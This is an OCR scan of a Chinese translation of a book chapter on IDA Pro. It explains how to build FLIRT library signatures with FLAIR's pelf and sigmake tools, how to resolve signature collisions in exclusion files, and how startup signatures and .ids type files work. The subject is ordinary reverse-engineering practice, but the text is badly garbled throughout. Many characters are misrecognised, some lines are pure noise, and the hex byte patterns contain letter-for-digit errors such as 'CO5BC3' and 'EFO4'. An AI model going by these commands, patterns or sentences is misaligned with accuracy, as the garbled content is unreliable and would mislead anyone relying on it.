sample file 2: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), 
statically linked, for GNU/Linux 2.6.32, stripped 


174 — & 123 使 用 FLIRT 签名 来 识别 库 





我 们 似乎 将 文件 的 来 源 缩小 到 了 Linux 系统 ， 但 是 ， 由 于 Linux 系统 存在 大 量 不 同 的 版 本 ， 
这 对 我 们 并 没有 太 大 的 帮助 。 运 行 strings 后 ， 我 们 发 现 以 下 信息 : 








GCC: (GNU) 4.5.1 20100924 (Red Hat 4.5.1-4) 


这 时 ， 搜 索 的 范围 进一步 缩小 到 gee 4.5.1 hod Ela HJ Red Hat 发 行 版 (或 其 派生 版 本 ), TE 
使 用 gcc 编译 的 二 进 制 文件 中 ， 这 种 GCC 标记 并 不 少见 。 好 在 去 除 符 号 的 过 程 中 ， 它 们 并 没有 
被 删除 ， 仍 然 可 以 被 strings 搜索 到 。 

需要 注意 的 是 , file 实用 工具 并 不 是 用 于 识别 文件 的 决定 性 因素 。 下 面 的 输出 证 实 了 一 种 简 
单 的 情况 ， 在 这 种 情况 下 ，file 似乎 知道 所 分 析 文 件 的 类 型 ， 但 它 的 输出 并 无 特殊 之 处 。 

















$ file sample file 3 
sample file 3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), 
dynamically linked (uses shared libs), stripped 








这 个 例子 取 目 一 球 Solaris 10 x86 系统 。 这 里 ,我 们 仍然 可 以 使 用 strings 实用 工具 来 确定 该 
系统 。 


12.3.3 创建 模式 文件 


现在 , 你 可 能 希望 为 一 个 或 几 个 库 创 建 签名 。 下 一 步 是 为 每 个 库 创 建 一 个 模式 文件 。 模式 文 
件 是 利用 合适 的 FLAIR 解析 器 实 用 工具 创建 的 。 和 可 执行 文件 一 样 ， 库 文件 也 是 基于 各 种 文件 
格式 规范 而 创建 的 。FLAIR 为 解析 屁 提 供 几 种 通用 的 库 文 件 格 式 。 如 FLAIR 的 readme.txt 所 述 ， 
你 可 以 在 FLAIR 的 bin 目录 中 找到 以 下 解析 器 。 

O plb.exe/plb. OMF 库 的 解析 硕 〈Borland Zee 3$ HJ )。 

O pcf.exe/pcf。COFF RED Hr és Chiki ns mH] )。 

O pelf.exe/pelf. ELF 库 的 解析 硕 〈 许 多 Unix 系统 常用 )。 

口 ppsx.exe/ppsx。Sony PlayStation PSX 库 的 解析 天 。 

Q ptmobj.exe/ptmobj。TriMedia 库 的 解析 天 。 

口 pomf166.exe/pomf166。Kiel OMF 166 对 和 象 文件 的 解析 需 。 

要 为 某 个 库 创建 一 个 模式 文件 ， 需 要 指定 与 库 的 格式 对 应 的 解析 絮 、 你 希望 解析 的 库 的 名 称 以 
及 生成 的 模式 文件 的 名 称 。 对 于 FreeBSD 8.0 系统 中 的 libe.a FE, 你 可 以 使 用 以 下 代码 创建 模式 文件 : 


$ ./pelf libc.a libc FreeBSD80.pat 
libc.a: skipped 1, total 1089 


这 里 ， 解 析 咒 指出 被 解析 的 文件 (libca) 被 忽略 的 函数 的 数量 (1 ) 及 生成 的 签名 模式 的 数 


量 〈1089 )。 每 个 解析 此 接 受 的 命令 行 选项 部 略 有 不 同 ， 这 些 差 异 全 部 记录 在 该 解析 带 的 使 用 声明 
中 。 右 执行 解析 右 时 不 使 用 参数 ， 这 个 解析 带 所 接受 的 所 有 命令 行 选项 将 显示 出 来 。plb.txt 文 件 所 
































(D plb 和 pcf 解 析 需 可 能 会 根据 命令 行 选项 忽略 一 些 函 数 。 
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供 了 有 关 plb 解析 带 所 接受 的 选项 的 详细 信息 。 这 个 文件 中 包含 大 量 基本 信息 ， 因 为 它 还 描述 了 
其 他 解析 各 接受 的 许多 选项 。 多数 情 况 下 , 仅仅 指出 被 解析 的 库 及 将 要 生成 的 模式 文件 的 名 称 束 
Ue Dr. 
模式 文件 是 一 个 文本 文件 ， 其 中 包含 提取 出 的 、 表 示 被 解析 库 中 的 图 数 的 模式 〈 每 行 显示 一 
种 模式 )。 前 面 创建 的 模式 文件 中 的 几 行 模式 如 下 所 示 : 
57568B7C240C8B742410FC8B4C2414C1E902F3A775108B4C241483E103F3A675 1E A55D 003E :0000 memcmp 


DFBCIM24047403406500310009 EE EE VENE EN ERES 00 0000 000D :0000 ffs 
57538B7C240C8B4C2410FC31C083F90F7E1B89FAF7DA83E20389CB29D389D1F3 12 9E31 0032 :0000 bzero 














FLAIR 的 pat.txt 文件 说 明 各 个 模式 的 格式 。 人 简单 地 说 , RA nm bay 22$ T E Hl neg 
数 的 初始 字 币 序列， 最 长 为 32 个 学 市 。 一 些 字 节 因 为 重 定位 的 入 口 而 有 所 不 同 ， 这 些 字 市 将 得 
l| "EST, 每 个 字 布 以 两 点 显示 。 如 果 一 个 图 数 短 于 32 个 字 市 (例如 前 面 代码 中 的 _ffs AX), 
用 点 将 模式 填充 到 64 "个 字符 。 除 32 个 初始 字 节 外 ， 模 式 中 记录 的 其 他 信息 专用 于 提高 签名 匹配 
过 程 的 准确 性 。 每 个 模式 行 中 的 其 他 信息 包括 由 函数 的 某 个 部 分 计算 得 出 的 CRCI 值 、 函 数 的 字 
方 长 度 以 及 函数 引用 的 符号 名 称 列表 。 一 般 来 说 , 引用 许多 其 他 符号 的 函数 越 长 , 它 生成 的 模式 行 
就 越 复 杂 。 在 前 面 生成 的 libe FreeBSD80.pat 文件 中 ,一 些 模式 行 的 长 度 超 过 了 20 000 个 字符 。 

几 名 第 三 方程 序 员 开发 出 了 一 些 实 用 工具 ， 可 用 于 从 现 有 的 IDA 数据 库 生 成 模式 。 其 中 一 
个 实用 工具 为 IDB 2 PAT2， 这 个 IDA 插 件 由 械 C. Roberts 编写 ， 它 能 够 为 现 有 数据 库 中 的 一 个 
或 多 个 函数 生成 模式 。 如 果 你 想 在 其 他 数据 库 中 直到 与 现 有 数据 库 中 的 函数 的 代码 类 似 的 代码 ， 
但 却 无 法 访问 用 于 创建 被 分 析 的 二 进 制 文件 的 原始 库 文件 ， 就 可 以 用 到 这 些 实用 工具 。 


12.3.4 ”创建 签名 文件 


为 某 个 库 创 建 模式 文件 后 ,创建 签名 过 程 的 下 一 个 步骤 是 生成 一 个 适合 IDA 使 用 的 .sig 文 件 。 
IDA 签名 文件 的 格式 与 模式 文件 的 格式 截然 不 同 。 签名 文件 采用 一 种 专用 二 进 制 格式 , 最 大 限度 
地 减少 呈现 模式 文件 中 的 全 部 信息 所 需 的 空间 数量 , 并 且 努 力 根 据 具 体 的 数据 库 内 容 实现 高 效 的 
签名 匹配 。Hex-Rays 的 网 站 宏观 介绍 了 签名 文件 的 结构 。 

FLAIR 的 sigmake 实用 工具 用 于 从 模式 文件 创建 签名 文件 。 由 于 模式 生成 与 签名 生成 被 划分 
成 两 个 不 同 的 阶段 , 因此, 签名 生成 过 程 完全 独立 于 模式 生成 过 程 ， 这 使 得 我 们 可 以 使 用 第 三 方 
的 模式 生成 工具 。 使 用 sigmake 解析 一 个 .pat 文件 并 创建 一 个 .sig 文件 是 生成 签名 的 最 简单 方法 ， 
如 下 所 示 : 



























































$ ./sigmake libssl.pat libssl.sig 





如 果 一 切 正常 ， 你 将 得 到 一 个 .sig 文件 ， 并 可 将 它 保存 到 <IDADIR>/sig 目录 中 。 但 是 ,你 很 





OD 每 个 字 节 需要 两 个 字符 。 要 显示 32 个 字 节 的 内 容 ， 需 要 64 个 十 六 进 制 字符 。 

D 这 是 一 个 16 位 循环 宛 余 校 验 值 。 生 成 模式 时 使 用 的 CRC16 实现 包含 在 FLAIR 工具 光盘 的 crc16.cpp 文件 中 。 
(3) 参见 http://www.openrce.org/downloads/details/26/IDB 2 DAT. 

(4) 参见 http://www.hex-rays.com/idapro/flirt.htm. 
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说 明 sigmake[] [] DUU sigmaketxtD00000000000000 Ms-Dos 8.30000 
UUUOOOOUOO0OOUODO0OU0OUO0O0U0O0OO0O0O0U00O000 DUDU DUO 
Ugagdgudi en 





通常 , 因为 在 生成 签名 的 过 程 中 , 你 必须 处 理 冲 突 , 因此 , 这 个 过 程 是 一 个 不 断 反 复 的 过 程 。 
只 要 有 两 个 函数 的 模式 相同 ， 就 会 发 生 冲 突 。 如 果 不 能 解决 冲突 ， 在 应 用 签名 的 过 程 中 ,我 们 就 
无 法 确定 困 数 到 底 与 哪 一 个 签名 相 匹 配 。 因 此 ，Ssigmake 必须 能 够 将 每 一 个 生成 的 签名 解析 成 一 
个 函数 名 称 。 否 则 ， 如 果 一 个 或 几 个 函数 的 模式 完全 相同 ，sigmake 生成 的 不 是 .sig 文件 ， 而 是 
一 个 排斥 文件 (exc) IEH sigmake 和 一 个 (组) 新 的 .pat 文件 ， 得 到 以 下 结果 : 








$ ./sigmake libc FreeBSD80.pat libc FreeBSD80.sig 
libc FreeBSD80.sig: modules/leaves: 1088/1024, COLLISIONS: 10 
See the documentation to learn how to resolve collisions. 


这 里 引用 的 文档 资料 为 sigmake.txt， 它 描述 了 sigmake 的 用 法 及 冲突 解决 过 程 。 实 际 上 ， 
次 sigmake 开始 执行 时 ， 它 都 会 搜索 一 个 对 应 的 排 夺 文件， 以 从 中 了 人 解 如 何 解 决 在 处 理 指定 的 模 
式 文件 时 直到 的 任何 冲突 。 如 果 没 有 这 个 排 帮 文 件 ， 在 发 生 冲 突 时 ，sigmake 会 生成 这 样 一 个 排 
奈 文 件 ， 而 不 是 签名 文件 。 在 上 面 的 例子 中 ,我 们 发 现 了 一 个 名 为 libe FreeBSD61.exc 的 新 建文 
件 。 在 创建 之 初 ， 排 斥 文件 是 文本 文件 ， 它 详细 说 明了 sigmake 在 处 理 模式 文件 时 遇 到 的 冲突 。 
你 必须 编辑 排斥 文件 ， 以 指导 sigmake 应 如 何 解决 任何 相互 冲突 的 模式 。 下 面 我 们 将 讨论 编辑 排 
太 文 件 的 一 般 过 程 。 

sigmake 生成 的 所 有 排斥 文件 均 以 下 面 的 代码 开头 : 





;--------- (delete these lines to allow sigmake to read this file) 
; add + at the start of a line to select a module 

; add '-' if you are not sure about the selection 
; do nothing if you want to exclude all modules 





这 些 代 码 的 目的 是 告诉 你 如 何 解决 冲突 ,以 成 功 生成 签名 。 你 需要 做 的 头 件 大 事 是 删除 4 13 
以 分 号 开头 的 代码 ， 和 否则 ，sigmake 将 无 法 在 随后 的 执行 过 程 中 解析 排斥 文件 。 下 一 步 是 告诉 
sigmake 你 希望 如 何 解 决 冲突 。 从 libe FreeBSD80.exc 中 提取 出 的 几 行 代码 如 下 所 示 : 





index 00 0000 538B4424088A4C240C908A1838D974074084DB75F531CO5BC3.............. 
 Strchr 00 0000 538B4424088A4C240C90841838D974074084DB75F531CO5BC3.............. 
 rindex 00 0000 538B5424088A4C240C31C0908A1A38D9750289D04284DB75F35BC3.......... 
 Strrchr 00 0000 538B5424088A4C240C31C0908A1A38D9750289D04284DB75F35BC3.......... 
flsl 01 EFO4 5531D289E58B450885C0741183F801B201740AD1E883C20183F80175F65D89D0 
fls 01 EFO4 5531D289E58B450885C0741183F801B201740AD1E883C20183F80175F65D89DO 





这 些 代 码 详 细 说 明了 3 个 冲突 :index 函数 很 难 与 strchr 函数 区 分 开 ,rindex 的 签名 与 strchr 
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Hl. "ei 5 fis 相互 冲突 。 如 果 你 熟悉 其 中 一 些 函 数 ， 对 于 上 面 的 结果 ， 你 就 不 会 觉得 奇怪 ， 
因为 相互 冲突 的 函数 基本 上 完全 相同 (例如 ，index 与 strchr 执行 相同 的 操作 )。 

为 了 让 你 “掌握 自己 的 命运 ”"，sigmake 让 你 仅 指定 一 个 困 数 作为 相关 签名 的 匹配 图 数 。 任 何 
时 候 ， 如 果 在 数据 库 中 发 现 一 个 对 应 的 签名 ,并 且 你 想 应 用 一 个 函数 的 名 称 ， 那么， 你 可 以 在 该 
哨 数 名 称 前 附加 一 个 加 号 ; 如 果 你 只 想 在 数据 库 中 添加 某 个 孔 数 的 注释 ， 则 在 该 函数 名 称 前 附加 
一 个 减 号 ; 如 果 在 数据 库 中 发 现 对 应 的 签名 时 ， 你 不 想 应 用 任何 名 称 ， 那 么 ， 你 不 需要 添加 任何 
符号 。 下 面 的 代码 为 上 面 提 到 的 3 个 冲突 提供 了 一 种 可 行 的 解决 方案 : 




















+ index 00 0000 538B4424088A4C240C908A1838D974074084DB75F531CO5BC3.............. 
_strchr 00 0000 538B4424088A4C240C908A1838D974074084DB75F531CO5BC3.............. 
_Tindex 00 0000 538B5424088A4C240C31C0908A1A38D9750289D04284DB75F35BC3.......... 
 strrchr 00 0000 538B5424088A4C240C31C0908A1A38D9750289D04284DB75F35BC3.......... 
flsl 01 EFO4 5531D289E58B450885C0741183F801B201740AD1E883C20183F80175F65D89DO 
- fls 01 EFO4 5531D289E58B450885C0741183F801B201740AD1E883C20183F80175F65D89DO 


在 这 个 代码 段 中 ， 我 们 决定 在 数据 库 中 发 现 第 一 个 签名 时 ,使 用 函数 名 index; 发 现 第 二 个 
签名 时 ,不 做 任何 处 理 ; 发 现 第 三 个 签名 时 ,在 数据 库 中 添加 一 段 有 关 fls 的 注释 。 在 解决 冲突 
时 ， 请 记 住 以 下 要 点 。 

(1) 为 最 大 限度 地 减少 冲突 ， 请 删除 排斥 文件 开头 的 4 个 注释 行 。 

(2) 最 多 只 能 给 冲突 函数 组 中 的 一 个 函数 附加 +/-。 

(3) 如 果 一 个 冲突 函数 组 仅 包含 一 个 函数 ， 不 要 在 该 函数 前 附加 +/-， 让 它 保持 原状 即 可 。 

(4) sigmake 连续 运行 失败 会 将 数据 ( 包括 注释 行 ) 附加 到 现 有 的 任何 排斥 文件 后 。 在 再 次 运 
ÍT sigmake 之 前 , 你 必须 删除 这 些 额 外 的 数据 , 并 更 正 原 始 数据 ( 如 末 这 些 数据 是 正确 的 , sigmake 
将 不 会 再 次 运行 失败 )。 

更 改 排斥 文件 后 , 你 必须 保存 这 个 文件 , 并 使 用 你 最 初 使 用 的 命令 行 参数 重新 运行 sigmake。 
这 一 次 ，sigmake 应 该 能 够 定位 和 这 照 你 的 排斥 文件 ， 并 成 功 生 成 一 个 .sig 文件 。 如 果 IDA 没有 
显示 错误 消息 ， 且 生成 一 个 .sig 文 件 ， 如 下 所 示 ， 即 表示 sigmake 操作 成 功 : 














$ ./sigmake libc FreeBSD80.pat libc FreeBSD80.sig 





成 功 生 成 签名 文件 后 ， 你 需要 将 它 复 制 到 你 的 <IDADIR>/sig 目录 中 ， 以 便 IDA 使 用 这 个 文 
件 。 随 后 ， 你 可 以 通过 File » Load File » FLIRT Signature File 访问 这 个 新 签名 。 

需要 注意 的 是 , 我 们 有 意 隐 藏 了 所 有 可 应 用 于 模式 生成 工具 和 sigmake 的 选项 。 有 关 可 选项 
的 完整 列表 , 请 参阅 plb.txt 和 sigmake.txt 文件 。 这 里 我 们 仪 介绍 sigmake 的 -n 选项 , 它 用 于 在 一 
个 生成 的 签名 文件 中 植 入 一 个 描述 性 的 名 称 。 这 个 名 称 将 在 选择 签名 的 过 程 中 显示 ( 见 图 12-1 )， 
并 可 在 对 签名 排序 时 提供 极 大 的 帮助 。 下 面 的 命令 行将 名 称 字 符 吕 “FreeBSD 8.0 C standard 
library” 植 入 到 生成 的 签名 文件 中 : 




















$ ./sigmake -n FreeB%9D 8.0 C standard library" libc FreeBSD80.pat libc FreeBSD80.sig 
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Ab, 你 还 可 以 使 用 排斥 文件 中 的 指令 指定 库 名 称 。 但 是 ,并 不 是 所 有 生成 签名 的 过 程 都 会 
需要 排斥 文件 ， 因 此 使 用 命令 行 的 方法 更 加 有 用 。 和 欲 了 解 更 多 详情 ， 请 参阅 sigmake.txt 文 件 。 





12.3.5 ”局 动 釜 名 


IDA 还 能 够 识别 一 种 特殊 的 签名 ， 即 启动 签名 (startup signature )。 在 初次 将 一 个 二 进 制 文件 
加 载 到 数据 库 中 ， 确 定 用 于 创建 该 二 进 制 文件 的 编译 带 时 ，IDA 将 应 用 启动 签名 。 如 采 IDA 能 
够 确定 用 于 构建 一 个 二 进 制 文件 的 编译 从 ,那么 ,在 初步 分 析 这 个 二 进 制 文件 的 过 程 中 ,IDA 会 
目 动 加 载 与 已 确定 的 编 详 希 有 关 的 其 他 签名 文件 。 

由 于 初次 加 载 文 件 时 ，IDA 并 不 知道 用 于 创建 该 文件 的 编译 希 类 型 ， 这 时 ，IDA 会 根据 所 加 
载 的 二 进 制 文件 的 类 型 来 分 类 和 选择 局 动 签 名 。 例 如 ， 如 采 加 载 的 是 一 个 Windows PE 二 进 制 文 
fF, 那么 ，IDA 会 加 载 与 PE 二 进 制 文 件 有 关 的 启动 签名 ， 以 确定 用 于 构建 该 PE 二 进 制 文件 的 
Zi i-e iit o 

要 生成 启动 签名 ,sigmake 将 处 理 描述 各 种 编译 器 生成 的 启动 例 程 "的 模式 , 并 把 得 到 的 签名 
组 合 到 一 个 特定 于 类 型 的 签名 文件 中 。FLAIR 工具 的 startup 目录 中 包含 IDA 使 用 的 启动 模式 ， 
以 及 用 于 从 这 些 模 式 创建 对 应 的 启动 签名 的 脚本 startup.bat ; 请 参阅 startup.bat 了 了 解 使 用 
sigmake 创建 某 一 特定 文件 格式 的 启动 签名 的 示例 。 

就 PE 文件 而 言 ， 你 会 在 startup 目录 中 发 现 几 个 pe *.pat 文 件 ， 这 些 文件 描述 的 是 一 些 常 用 
的 Windows 编译 带 所 使 用 的 局 动 模式 , 如 描述 Visual Studio 模式 的 pe_vc.pat 文件 和 描述 Cygwin/ 
gcc 模式 的 pe_gcc.pat 文 件 。 如 果 你 希望 添加 PE 文件 的 其 他 启动 模式 ,必须 将 它们 添加 到 一 个 现 
有 的 PE 模式 文件 中 ， 或 创建 一 个 名 称 以 pe_ 开 头 的 新 模式 文件 ， 以 方便 生成 启动 签名 的 脚本 找 
到 你 的 模式 ， 并 将 它们 合并 到 新 生成 的 PE 签名 中 。 

最 后 ,你 还 需要 注意 局 动 模式 的 格式 , 它 与 为 库 函 数 生 成 的 模式 的 格式 稍 有 不 同 。 其 不 同 在 
T: 启动 模式 行 能 够 将 启动 模式 与 其 他 签名 关联 起 来 ,在 对 启动 模式 进行 匹配 时 ,IDA 还 会 应 用 
这 些 签名 。 除 startup 目录 中 保存 的 示例 启动 模式 处 ，FLAIR 中 的 任何 文本 文件 都 没有 记录 局 动 
模式 的 格式 。 























12.4 ”小 结 


库 代 码 目 动 识别 是 一 个 重要 的 功能 , 它 明 显 减 少 了 分 析 静 态 链接 二 进 制 文件 所 需 的 时 间 。 利 
用 它 的 FLIRT 和 FLAIR 功能 ， 用 户 可 从 现 有 的 静态 库 创 建 他 们 自己 的 库 签 名 ， 它 不 仅 使 自动 代 
码 识别 成 为 可 能 , 而 且 使 它 具 有 了 可 扩展 性 。 对 于 任何 可 能 遇 到 静态 链接 二 进 制 文件 的 用 户 而 言 ， 
了 解 如 何 生 成 签名 是 一 项 基本 的 技能 。 














CD 通常 ,启动 例 程 被 视 为 程序 的 入 口 点 。 在 C/C++ 程 序 中 , 启动 例 程 用 于 在 将 控制 权 转交 给 main 函数 之 前 对 程序 的 
环境 进行 初始 化 。 
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的 助 记 符 和 操作 码 组 成 的 。 为 使 反 汇 编 代 码 清单 发 挥 更 大 的 作用 ， 我 们 需要 用 在 处 理 
各 种 与 API 有 关 的 数据 ( 如 消 数 原型 和 标准 数据 类 型 ) 时 获得 的 信息 来 扩充 反 汇 编 代 码 清单 。 在 
第 8 草 中 ， 我 们 讨论 了 IDA 如何 处 理 数 据 结 构 ， 包 括 如 何 访问 标准 API 数据 结构 和 如 何 定 制 数 
据 结 构 。 本 章 将 通过 分 析 IDA 的 idsutils 和 1oadint 实用 工具 的 用 法 ， 继 续 讨 论 扩展 IDA 的 知 
识 。 你 可 以 从 IDA 的 产品 光盘 上 获得 这 些 实用 工具 ， 或 者 从 Hex-Rays 的 下 载 站 点 下 载 "。 


13.1 扩充 函数 信息 


IDA 通过 两 种 途径 获得 与 函数 有 关 的 信息 : 类 型 库 (til) 文件 和 IDS 实用 工具 (ids) 文件 。 
在 初始 分 析 阶 段 , IDA 使 用 存储 在 这 些 文件 中 的 信息 来 提高 反 汇 编 过 程 的 准确 性 及 反 汇 编 代 码 清 
单 的 可 读 性 。 它 通过 合并 函数 参数 名 称 和 类 型 ， 以 及 与 各 种 库 果 数 有 关 的 注释 来 完成 这 个 任务 。 

第 8 草 曾 提 到 过 , 类 型 库 文件 是 IDA 用 于 存储 复杂 数据 结构 布局 的 机 制 。 同时 , IDA 还 使 用 
类 型 库 文件 记录 与 也 数 的 调用 约定 和 参数 序列 有 关 的 信息 。IDA 以 各 种 方式 使 用 吨 数 签名 信息 。 
首先 ， 当 一 个 二 进 制 文件 使 用 共享 库 时 ，IDA 无 法 知道 这 些 库 中 的 函数 使 用 的 是 什么 调用 约定 。 
这 时 ,IDA 会 尝试 根据 一 个 类 型 库 文件 中 的 相关 签名 来 匹配 库 函 数 ,。 如果 它 发 现 一 个 匹配 的 签名 ， 
IDA 就 可 以 知道 这 个 函数 使 用 的 调用 约定 ， 并 对 栈 指 针 进行 必要 的 调整 ( 如 前 所 述 ，stdcall PR 
数目 己 对 栈 进行 清理 )。 使 用 浮 数 签名 的 第 二 种 方式 是 为 传递 给 洱 数 的 参数 提供 注释 。 这 些 注释 
说 明 在 调用 函数 之 前 ， 到 底 是 哪 一 个 参数 被 压 人 到 栈 上 。 注 释 提 供 的 信息 量 取决 于 DA 能 够 解 
析 的 本 数 签 名 所 包含 的 信息 量 。 下 面 的 两 个 签名 都 是 有 效 的 C 声明, 第 二 个 签名 提供 了 更 多 有 关 
国 数 的 信息 ， 除 数据 类 型 以 外 ， 它 还 提供 了 形式 参数 名 称 。 












































LSTATUS  stdcall RegOpenKey(HKEY, LPCTSTR, PHKEY); 
LSTATUS stdcall RegOpenKey(HKEY hKey, LPCTSTR lpSubKey, PHKEY phkResult); 


IDA 的 类 型 库 中 保存 着 大 量 常 用 API mër (包括 许多 Windows API) 的 签名 信息 。 调 用 
RegOpenKey 函数 的 默认 反 汇 编 代码 清单 如 下 所 示 : 


D 参见 http://www.hex-rays.com/idapro/idadown.htm。 下 载 时 需要 提供 有 效 的 用 户 名 和 密码 。 
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.text:00401006 00C lea eax, [ebp+@hkey | 

.text:00401009 00C push eax 6; phkResult 

.text:0040100A 010 push offset OSubKey  ; "SoftwareNMHex-Rays NW IDA" 
.text:0040100F 014 push 80000001h 6; hkey 

.text:00401014 018 call ds:RegOpenKeyA 

.text:0040101A 600C mov [ebp+var 8], eax 





值得 注意 的 是 , IDA 已 经 在 右边 缘 ( @ ) 添加 了 注释 , 指出 在 调用 RegopenKey 之 前 , 每 个 指 
令 压 人 了 什么 参数 。 如 果 函 数 签名 提供 形式 参数 名 称 ， 那 么 IDA 会 更 进一步 ， 自 动 为 与 特定 的 
参数 对 应 的 变量 命名 。 在 前 面 例子 中 的 @@ 处 ， 我 们 看 到 IDA 已 经 根据 RegOpenKey 原型 中 对 应 的 
形式 参数 名 称 ， 对 一 个 局 部 变量 ChKey) 和 一 个 全 局 变量 ( SubKey ) 进行 了 命名 。 如 果 解 析 后 的 
函数 原型 中 仪 包含 类 型 信息 ,而 没有 形式 参数 名 称 ， 那么 , 前 面 例子 中 的 注释 将 指出 对 应 参数 的 
数据 类 型 ， 而 非 参数 名 称 。 至 于 IpSubKey 参数 ， 这 个 参数 名 称 并 不 作为 注释 显示 ， 因 为 这 个 参 
数 磁 巧 指向 一 个 全 局 字符 串 变 量 ， 而 该 字符 串 的 内 容 则 通过 IDA 的 重复 注释 机 制 显示 。 最 后 ， 
需要 注意 的 是 ，IDA 已 经 将 RegOpenKey 识别 为 一 个 stdcall 困 数 ， 并 有 目 动 调整 了 栈 指 针 ( 9), 
RegOpenKey 在 返回 时 也 会 这 样 做 。 所 有 这 些 信息 均 源 自 该 函数 的 签名 ， 同 时 ，IDA 将 在 反 汇 编 代 
但 清单 中 适当 的 导入 表 位 置 以 注释 的 形式 显示 这 些 信 息 ， 如 下 面 的 代码 段 所 示 : 




















.idata:0040A000 ; LSTATUS  stdcall RegOpenKeyA(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult) 
.idata:0040A000 extrn RegOpenKeyA:dword ; CODE XREF: main+14p 
.idata:0040A000 ; DATA XREF: main+14r 





显示 函数 原型 的 注释 来 自 IDA DI ro) CHE. 该 文件 提供 与 Windows API KAA RIR S o 

那么 ， 在 什么 情况 下 ， 你 希望 生成 自己 的 函数 类 型 签名 " 呢 ? 如 果 你 遇 到 一 个 链接 到 ( 无论 
是 动态 还 是 静态 ) IDA 并 不 包含 其 函数 原型 的 库 的 二 进 制 文件 , 你 可 能 希望 为 这 个 库 中 的 所 有 矣 
数 生成 类 型 签名 信息 ， 以 便 IDA 能 够 为 自动 为 你 的 反 汇 编 代 码 清 单 生 成 注释 。 这 类 库 包 括 常 用 
的 图 形 或 加 密 库 ， 虽 然 它 们 不 属于 标准 Windows 库 ， 但 却 使 用 广泛 。OpenSSL 加 密 库 就 是 这 样 
EE, 

第 8 章 提 到 过 ， 我 们 可 以 在 一 个 数据 库 的 本 地 .tl 文件 中 添加 复杂 的 数据 类 型 信息 。 同 样 ， 
我 们 可 以 通过 File > Load File > Parse Header File MALE IDA 解析 一 个 或 几 个 函数 原型 ， 在 同一 
个 . 镁 文 件 中 添加 函数 原型 信息 。 类 侯 地 ， 你 可 以 使 用 tilib.exe (参见 第 8 章 ) 解析 头 文件 和 创建 
独立 的 . 蕊 文件， 通过 将 这 些 . 蕊 文件 复制 到 <IDADIR>/til 中 ， 这 些 文件 就 可 以 全 局 使 用 。 

如 果 你 可 以 访问 源 代码 ， 然 后 允许 IDA (或 tilibexe) 为 你 解析 源 代码 ， 那 当然 很 好 。 但 多 
数 情况 下 ,你 都 无 法 访问 相关 源 代码 ， 并 且 你 仍然 希望 获得 高 质量 的 反 汇 编 代码 清单 。 那 么 , 在 
没有 源 代码 可 供 参 考 的 情况 下 ， 你 如 何 为 IDA 提供 信息 呢 ? 这 正 是 IDA 实用 工具 或 idsutils 的 
作用 所 在 。 这 些 IDA 实用 工具 包括 3 个 用 于 创建 .ids 文件 的 实用 程序 。 我 们 首先 介绍 .ids 文件 的 
定义 ， 然 后 说 明 如 何 创 建 我 们 自己 的 .ids 文件 。 



































J 这 里 ,我 们 使 用 术语 “签名 ”表示 一 个 函数 的 参数 类 型 、 数 量 和 顺序 ， 而 不 是 匹配 已 编译 函数 的 代码 模式 。 
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à Edit imported function X] 


Mame of function: RegOpenKeyA 


Purged bytes | 12 D (-1:undefined) 
[ Doesnotreturn 







图 13-1 编辑 导入 函数 


[HugHiHEtiuiiltuutuYUuiu ULUL Edit » Functions » Edi Function[] U 
到 
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是 和 


13.1.1 IDS 文件 


IDA 使 用 .ids 文件 扩展 它 在 库 函 数 方面 的 知识 。.ids 文件 通过 列举 共享 库 中 包含 的 每 一 个 导 
出 函数 ， 来 描述 这 个 库 的 内 容 。 与 图 数 有 关 的 详细 信息 包括 函数 名 称 、 它 的 相关 序号 ?， 还 包括 
该 函数 是 否 使 用 stdcall (如 果 使 用 stdcall, 包括 返回 时 该 函数 从 栈 上 删除 了 多 少 字 厄 的 代码 )， 
另外 也 包括 在 反 汇 编 代 码 清单 中 引用 该 函数 时 显示 的 可 选 注释 。.ids 文件 实际 上 是 压缩 后 的 .idt 
文件 ， 后 者 包含 每 个 库 函 数 的 文本 说 明 。 























CD Tlfak 在 他 的 一 篇 博客 文章 中 介绍 了 在 IDA 5.1 版 中 引入 的 “单纯 方法 ”， 地 址 为 http://hexblog.com/2006/06。 
(2) 序号 是 与 每 个 导出 函数 有 关 的 整数 索引 。 使 用 序号 可 通过 整数 查询 表 迅 速 定位 一 个 函数 。 若 通过 将 函数 名 称 与 字 
符 串 进行 比较 来 定位 丽 数 ， 则 很 缓慢 。 
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初次 在 数据 库 中 加 载 一 个 可 执行 文件 时 ，IDA 将 确定 该 文件 所 依赖 的 共享 库 。IDA 会 在 
<IDADIR>/ids 目录 中 搜索 与 每 一 个 共 至 库 对 应 的 .ids 文件 , 以 获得 有 关 该 可 执行 文件 可 能 引用 的 
任何 库 也 数 的 说 明 。 需 要 记 住 的 是 ，.ids 文件 中 不 一 定 包 含 函 数 签名 信息 。 因 此 ，IDA 可 能 无 法 
仅仅 根据 .ids 文件 中 的 信息 提供 函数 参数 分 析 。 但 是 ， 如 采 .ids 文件 能 够 正确 指出 函数 所 使 用 的 
调用 约定 , 以 及 函数 从 栈 中 清除 的 字 节 数量 , DA 就 能 够 进行 准确 的 栈 指针 调整 。 如 果 一 个 DLL 
导出 改编 名 称 ，IDA 就 能 够 根据 这 个 改编 名 称 推 凯 出 一 个 函数 的 参数 签名 ， 在 加 载 .ids 文件 后 ， 
我 们 就 可 以 利用 这 些 信息 。 我 们 将 在 13.1.2 市 介绍 .idt 文 件 的 语法 。 在 这 方面 ，. 世 文件 包含 与 反 
汇编 郴 数 调用 有 关 的 更 多 有 用 信息 ， 不过， 要 想 生成 . 包 文 件 ， 你 需要 使 用 源 代 码 。 




















13.1.2 ”创建 IDS 文 件 


IDA 的 idsutils 实用 工具 用 于 创建 .ids 文件 。 这 些 实用 工具 包括 两 个 库 解 析 需 : 从 Windows 
DLL 中 提取 信息 的 dll2idt 和 从 ar 库 中 提取 信息 的 ar2idtexe。 无 论 使 用 哪 一 个 解析 器 ， 其 输出 都 
是 一 个 .idt 文 本 文件 ， 它 每 行 显示 一 个 导出 哨 数 ， 并 将 导出 函数 的 序号 与 函数 名 称 对 应 起 来 。.idt 
文件 的 语法 非常 简单 ，idsutils 自 带 的 readme.txt 文件 介绍 了 这 种 语法 。.idt 文件 中 的 绝 大 多 数 行 
用 于 根据 以 下 方案 描述 导出 函数 。 

口 导出 项 以 正 数 开 头 ， 这 个 数 是 导出 函数 的 序号 。 

